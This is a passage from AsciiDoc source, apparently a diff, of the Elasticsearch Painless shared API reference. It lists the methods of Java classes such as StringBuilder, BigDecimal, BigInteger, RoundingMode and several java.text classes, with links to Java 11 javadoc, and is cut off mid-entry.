{java11-javadoc}/java.base/java/lang/StringBuilder.html#lastIndexOf(java.lang.String)[lastIndexOf](null) -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#lastIndexOf(java.lang.String,int)[lastIndexOf](null, int) -* int {java11-javadoc}/java.base/java/lang/CharSequence.html#length()[length]() -* int {java11-javadoc}/java.base/java/lang/StringBuilder.html#offsetByCodePoints(int,int)[offsetByCodePoints](int, int) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#replace(int,int,java.lang.String)[replace](int, int, null) -* null replaceAll(Pattern, Function) -* null replaceFirst(Pattern, Function) -* StringBuilder {java11-javadoc}/java.base/java/lang/StringBuilder.html#reverse()[reverse]() -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#setCharAt(int,char)[setCharAt](int, char) -* void {java11-javadoc}/java.base/java/lang/StringBuilder.html#setLength(int)[setLength](int) -* CharSequence {java11-javadoc}/java.base/java/lang/CharSequence.html#subSequence(int,int)[subSequence](int, int) -* null {java11-javadoc}/java.base/java/lang/StringBuilder.html#substring(int)[substring](int) -* null {java11-javadoc}/java.base/java/lang/StringBuilder.html#substring(int,int)[substring](int, int) -* null {java11-javadoc}/java.base/java/lang/CharSequence.html#toString()[toString]() - - -[[painless-api-reference-shared-StringIndexOutOfBoundsException]] -==== StringIndexOutOfBoundsException -* {java11-javadoc}/java.base/java/lang/StringIndexOutOfBoundsException.html#()[StringIndexOutOfBoundsException]() -* {java11-javadoc}/java.base/java/lang/StringIndexOutOfBoundsException.html#(java.lang.String)[StringIndexOutOfBoundsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-System]] -==== System -* static void {java11-javadoc}/java.base/java/lang/System.html#arraycopy(java.lang.Object,int,java.lang.Object,int,int)[arraycopy](Object, int, Object, int, int) -* static long {java11-javadoc}/java.base/java/lang/System.html#currentTimeMillis()[currentTimeMillis]() -* static long {java11-javadoc}/java.base/java/lang/System.html#nanoTime()[nanoTime]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-TypeNotPresentException]] -==== TypeNotPresentException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null {java11-javadoc}/java.base/java/lang/TypeNotPresentException.html#typeName()[typeName]() - - -[[painless-api-reference-shared-UnsupportedOperationException]] -==== UnsupportedOperationException -* {java11-javadoc}/java.base/java/lang/UnsupportedOperationException.html#()[UnsupportedOperationException]() -* {java11-javadoc}/java.base/java/lang/UnsupportedOperationException.html#(java.lang.String)[UnsupportedOperationException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Void]] -==== Void -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-math"] -=== Shared API for package java.math -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-BigDecimal]] -==== BigDecimal -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ONE[ONE] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#TEN[TEN] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ZERO[ZERO] -* static BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#valueOf(double)[valueOf](double) -* {java11-javadoc}/java.base/java/math/BigDecimal.html#(java.lang.String)[BigDecimal](null) -* {java11-javadoc}/java.base/java/math/BigDecimal.html#(java.lang.String,java.math.MathContext)[BigDecimal](null, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#abs()[abs]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#abs(java.math.MathContext)[abs](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#add(java.math.BigDecimal)[add](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#add(java.math.BigDecimal,java.math.MathContext)[add](BigDecimal, MathContext) -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* byte {java11-javadoc}/java.base/java/math/BigDecimal.html#byteValueExact()[byteValueExact]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#compareTo(java.math.BigDecimal)[compareTo](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divide(java.math.BigDecimal)[divide](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divide(java.math.BigDecimal,java.math.MathContext)[divide](BigDecimal, MathContext) -* BigDecimal[] {java11-javadoc}/java.base/java/math/BigDecimal.html#divideAndRemainder(java.math.BigDecimal)[divideAndRemainder](BigDecimal) -* BigDecimal[] {java11-javadoc}/java.base/java/math/BigDecimal.html#divideAndRemainder(java.math.BigDecimal,java.math.MathContext)[divideAndRemainder](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divideToIntegralValue(java.math.BigDecimal)[divideToIntegralValue](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#divideToIntegralValue(java.math.BigDecimal,java.math.MathContext)[divideToIntegralValue](BigDecimal, MathContext) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#intValueExact()[intValueExact]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* long {java11-javadoc}/java.base/java/math/BigDecimal.html#longValueExact()[longValueExact]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#max(java.math.BigDecimal)[max](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#min(java.math.BigDecimal)[min](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#movePointLeft(int)[movePointLeft](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#movePointRight(int)[movePointRight](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#multiply(java.math.BigDecimal)[multiply](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#multiply(java.math.BigDecimal,java.math.MathContext)[multiply](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#negate()[negate]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#negate(java.math.MathContext)[negate](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#plus()[plus]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#plus(java.math.MathContext)[plus](MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#pow(int)[pow](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#pow(int,java.math.MathContext)[pow](int, MathContext) -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#precision()[precision]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#remainder(java.math.BigDecimal)[remainder](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#remainder(java.math.BigDecimal,java.math.MathContext)[remainder](BigDecimal, MathContext) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#round(java.math.MathContext)[round](MathContext) -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#scale()[scale]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#scaleByPowerOfTen(int)[scaleByPowerOfTen](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#setScale(int)[setScale](int) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#setScale(int,java.math.RoundingMode)[setScale](int, RoundingMode) -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* short {java11-javadoc}/java.base/java/math/BigDecimal.html#shortValueExact()[shortValueExact]() -* int {java11-javadoc}/java.base/java/math/BigDecimal.html#signum()[signum]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#stripTrailingZeros()[stripTrailingZeros]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#subtract(java.math.BigDecimal)[subtract](BigDecimal) -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#subtract(java.math.BigDecimal,java.math.MathContext)[subtract](BigDecimal, MathContext) -* BigInteger {java11-javadoc}/java.base/java/math/BigDecimal.html#toBigInteger()[toBigInteger]() -* BigInteger {java11-javadoc}/java.base/java/math/BigDecimal.html#toBigIntegerExact()[toBigIntegerExact]() -* null {java11-javadoc}/java.base/java/math/BigDecimal.html#toEngineeringString()[toEngineeringString]() -* null {java11-javadoc}/java.base/java/math/BigDecimal.html#toPlainString()[toPlainString]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* BigDecimal {java11-javadoc}/java.base/java/math/BigDecimal.html#ulp()[ulp]() - - -[[painless-api-reference-shared-BigInteger]] -==== BigInteger -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#ONE[ONE] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#TEN[TEN] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#ZERO[ZERO] -* static BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#valueOf(long)[valueOf](long) -* {java11-javadoc}/java.base/java/math/BigInteger.html#(java.lang.String)[BigInteger](null) -* {java11-javadoc}/java.base/java/math/BigInteger.html#(java.lang.String,int)[BigInteger](null, int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#abs()[abs]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#add(java.math.BigInteger)[add](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#and(java.math.BigInteger)[and](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#andNot(java.math.BigInteger)[andNot](BigInteger) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#bitCount()[bitCount]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#bitLength()[bitLength]() -* byte {java11-javadoc}/java.base/java/lang/Number.html#byteValue()[byteValue]() -* byte {java11-javadoc}/java.base/java/math/BigInteger.html#byteValueExact()[byteValueExact]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#clearBit(int)[clearBit](int) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#compareTo(java.math.BigInteger)[compareTo](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#divide(java.math.BigInteger)[divide](BigInteger) -* BigInteger[] {java11-javadoc}/java.base/java/math/BigInteger.html#divideAndRemainder(java.math.BigInteger)[divideAndRemainder](BigInteger) -* double {java11-javadoc}/java.base/java/lang/Number.html#doubleValue()[doubleValue]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#flipBit(int)[flipBit](int) -* float {java11-javadoc}/java.base/java/lang/Number.html#floatValue()[floatValue]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#gcd(java.math.BigInteger)[gcd](BigInteger) -* int {java11-javadoc}/java.base/java/math/BigInteger.html#getLowestSetBit()[getLowestSetBit]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* int {java11-javadoc}/java.base/java/lang/Number.html#intValue()[intValue]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#intValueExact()[intValueExact]() -* long {java11-javadoc}/java.base/java/lang/Number.html#longValue()[longValue]() -* long {java11-javadoc}/java.base/java/math/BigInteger.html#longValueExact()[longValueExact]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#max(java.math.BigInteger)[max](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#min(java.math.BigInteger)[min](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#mod(java.math.BigInteger)[mod](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#modInverse(java.math.BigInteger)[modInverse](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#modPow(java.math.BigInteger,java.math.BigInteger)[modPow](BigInteger, BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#multiply(java.math.BigInteger)[multiply](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#negate()[negate]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#not()[not]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#or(java.math.BigInteger)[or](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#pow(int)[pow](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#remainder(java.math.BigInteger)[remainder](BigInteger) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#setBit(int)[setBit](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#shiftLeft(int)[shiftLeft](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#shiftRight(int)[shiftRight](int) -* short {java11-javadoc}/java.base/java/lang/Number.html#shortValue()[shortValue]() -* short {java11-javadoc}/java.base/java/math/BigInteger.html#shortValueExact()[shortValueExact]() -* int {java11-javadoc}/java.base/java/math/BigInteger.html#signum()[signum]() -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#subtract(java.math.BigInteger)[subtract](BigInteger) -* boolean {java11-javadoc}/java.base/java/math/BigInteger.html#testBit(int)[testBit](int) -* byte[] {java11-javadoc}/java.base/java/math/BigInteger.html#toByteArray()[toByteArray]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* null {java11-javadoc}/java.base/java/math/BigInteger.html#toString(int)[toString](int) -* BigInteger {java11-javadoc}/java.base/java/math/BigInteger.html#xor(java.math.BigInteger)[xor](BigInteger) - - -[[painless-api-reference-shared-MathContext]] -==== MathContext -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL128[DECIMAL128] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL32[DECIMAL32] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#DECIMAL64[DECIMAL64] -* static MathContext {java11-javadoc}/java.base/java/math/MathContext.html#UNLIMITED[UNLIMITED] -* {java11-javadoc}/java.base/java/math/MathContext.html#(int)[MathContext](int) -* {java11-javadoc}/java.base/java/math/MathContext.html#(int,java.math.RoundingMode)[MathContext](int, RoundingMode) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/math/MathContext.html#getPrecision()[getPrecision]() -* RoundingMode {java11-javadoc}/java.base/java/math/MathContext.html#getRoundingMode()[getRoundingMode]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-RoundingMode]] -==== RoundingMode -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#CEILING[CEILING] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#DOWN[DOWN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#FLOOR[FLOOR] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_DOWN[HALF_DOWN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_EVEN[HALF_EVEN] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#HALF_UP[HALF_UP] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#UNNECESSARY[UNNECESSARY] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#UP[UP] -* static RoundingMode {java11-javadoc}/java.base/java/math/RoundingMode.html#valueOf(java.lang.String)[valueOf](null) -* static RoundingMode[] {java11-javadoc}/java.base/java/math/RoundingMode.html#values()[values]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#compareTo(java.lang.Enum)[compareTo](Enum) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Enum.html#name()[name]() -* int {java11-javadoc}/java.base/java/lang/Enum.html#ordinal()[ordinal]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[role="exclude",id="painless-api-reference-shared-java-text"] -=== Shared API for package java.text -See the <> for a high-level overview of all packages and classes. - -[[painless-api-reference-shared-Annotation]] -==== Annotation -* {java11-javadoc}/java.base/java/text/Annotation.html#(java.lang.Object)[Annotation](Object) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* def {java11-javadoc}/java.base/java/text/Annotation.html#getValue()[getValue]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedCharacterIterator]] -==== AttributedCharacterIterator -* def {java11-javadoc}/java.base/java/text/CharacterIterator.html#clone()[clone]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#first()[first]() -* Set {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAllAttributeKeys()[getAllAttributeKeys]() -* def {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAttribute(java.text.AttributedCharacterIterator$Attribute)[getAttribute](AttributedCharacterIterator.Attribute) -* Map {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getAttributes()[getAttributes]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunLimit()[getRunLimit]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunLimit(java.util.Set)[getRunLimit](Set) -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunStart()[getRunStart]() -* int {java11-javadoc}/java.base/java/text/AttributedCharacterIterator.html#getRunStart(java.util.Set)[getRunStart](Set) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#last()[last]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#next()[next]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#previous()[previous]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedCharacterIterator-Attribute]] -==== AttributedCharacterIterator.Attribute -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#INPUT_METHOD_SEGMENT[INPUT_METHOD_SEGMENT] -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#LANGUAGE[LANGUAGE] -* static AttributedCharacterIterator.Attribute {java11-javadoc}/java.base/java/text/AttributedCharacterIterator$Attribute.html#READING[READING] -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-AttributedString]] -==== AttributedString -* {java11-javadoc}/java.base/java/text/AttributedString.html#(java.lang.String)[AttributedString](null) -* {java11-javadoc}/java.base/java/text/AttributedString.html#(java.lang.String,java.util.Map)[AttributedString](null, Map) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttribute(java.text.AttributedCharacterIterator$Attribute,java.lang.Object)[addAttribute](AttributedCharacterIterator.Attribute, Object) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttribute(java.text.AttributedCharacterIterator$Attribute,java.lang.Object,int,int)[addAttribute](AttributedCharacterIterator.Attribute, Object, int, int) -* void {java11-javadoc}/java.base/java/text/AttributedString.html#addAttributes(java.util.Map,int,int)[addAttributes](Map, int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator()[getIterator]() -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator(java.text.AttributedCharacterIterator$Attribute%5B%5D)[getIterator](AttributedCharacterIterator.Attribute[]) -* AttributedCharacterIterator {java11-javadoc}/java.base/java/text/AttributedString.html#getIterator(java.text.AttributedCharacterIterator$Attribute%5B%5D,int,int)[getIterator](AttributedCharacterIterator.Attribute[], int, int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Bidi]] -==== Bidi -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_DEFAULT_LEFT_TO_RIGHT[DIRECTION_DEFAULT_LEFT_TO_RIGHT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_DEFAULT_RIGHT_TO_LEFT[DIRECTION_DEFAULT_RIGHT_TO_LEFT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_LEFT_TO_RIGHT[DIRECTION_LEFT_TO_RIGHT] -* static int {java11-javadoc}/java.base/java/text/Bidi.html#DIRECTION_RIGHT_TO_LEFT[DIRECTION_RIGHT_TO_LEFT] -* static void {java11-javadoc}/java.base/java/text/Bidi.html#reorderVisually(byte%5B%5D,int,java.lang.Object%5B%5D,int,int)[reorderVisually](byte[], int, Object[], int, int) -* static boolean {java11-javadoc}/java.base/java/text/Bidi.html#requiresBidi(char%5B%5D,int,int)[requiresBidi](char[], int, int) -* {java11-javadoc}/java.base/java/text/Bidi.html#(java.text.AttributedCharacterIterator)[Bidi](AttributedCharacterIterator) -* {java11-javadoc}/java.base/java/text/Bidi.html#(java.lang.String,int)[Bidi](null, int) -* {java11-javadoc}/java.base/java/text/Bidi.html#(char%5B%5D,int,byte%5B%5D,int,int,int)[Bidi](char[], int, byte[], int, int, int) -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#baseIsLeftToRight()[baseIsLeftToRight]() -* Bidi {java11-javadoc}/java.base/java/text/Bidi.html#createLineBidi(int,int)[createLineBidi](int, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getBaseLevel()[getBaseLevel]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getLength()[getLength]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getLevelAt(int)[getLevelAt](int) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunCount()[getRunCount]() -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunLevel(int)[getRunLevel](int) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunLimit(int)[getRunLimit](int) -* int {java11-javadoc}/java.base/java/text/Bidi.html#getRunStart(int)[getRunStart](int) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isLeftToRight()[isLeftToRight]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isMixed()[isMixed]() -* boolean {java11-javadoc}/java.base/java/text/Bidi.html#isRightToLeft()[isRightToLeft]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-BreakIterator]] -==== BreakIterator -* static int {java11-javadoc}/java.base/java/text/BreakIterator.html#DONE[DONE] -* static Locale[] {java11-javadoc}/java.base/java/text/BreakIterator.html#getAvailableLocales()[getAvailableLocales]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getCharacterInstance()[getCharacterInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getCharacterInstance(java.util.Locale)[getCharacterInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getLineInstance()[getLineInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getLineInstance(java.util.Locale)[getLineInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getSentenceInstance()[getSentenceInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getSentenceInstance(java.util.Locale)[getSentenceInstance](Locale) -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getWordInstance()[getWordInstance]() -* static BreakIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getWordInstance(java.util.Locale)[getWordInstance](Locale) -* def {java11-javadoc}/java.base/java/text/BreakIterator.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#first()[first]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#following(int)[following](int) -* CharacterIterator {java11-javadoc}/java.base/java/text/BreakIterator.html#getText()[getText]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/text/BreakIterator.html#isBoundary(int)[isBoundary](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#last()[last]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#next()[next]() -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#next(int)[next](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#preceding(int)[preceding](int) -* int {java11-javadoc}/java.base/java/text/BreakIterator.html#previous()[previous]() -* void {java11-javadoc}/java.base/java/text/BreakIterator.html#setText(java.lang.String)[setText](null) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-CharacterIterator]] -==== CharacterIterator -* static char {java11-javadoc}/java.base/java/text/CharacterIterator.html#DONE[DONE] -* def {java11-javadoc}/java.base/java/text/CharacterIterator.html#clone()[clone]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#current()[current]() -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#first()[first]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getBeginIndex()[getBeginIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getEndIndex()[getEndIndex]() -* int {java11-javadoc}/java.base/java/text/CharacterIterator.html#getIndex()[getIndex]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#last()[last]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#next()[next]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#previous()[previous]() -* char {java11-javadoc}/java.base/java/text/CharacterIterator.html#setIndex(int)[setIndex](int) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-ChoiceFormat]] -==== ChoiceFormat -* static double 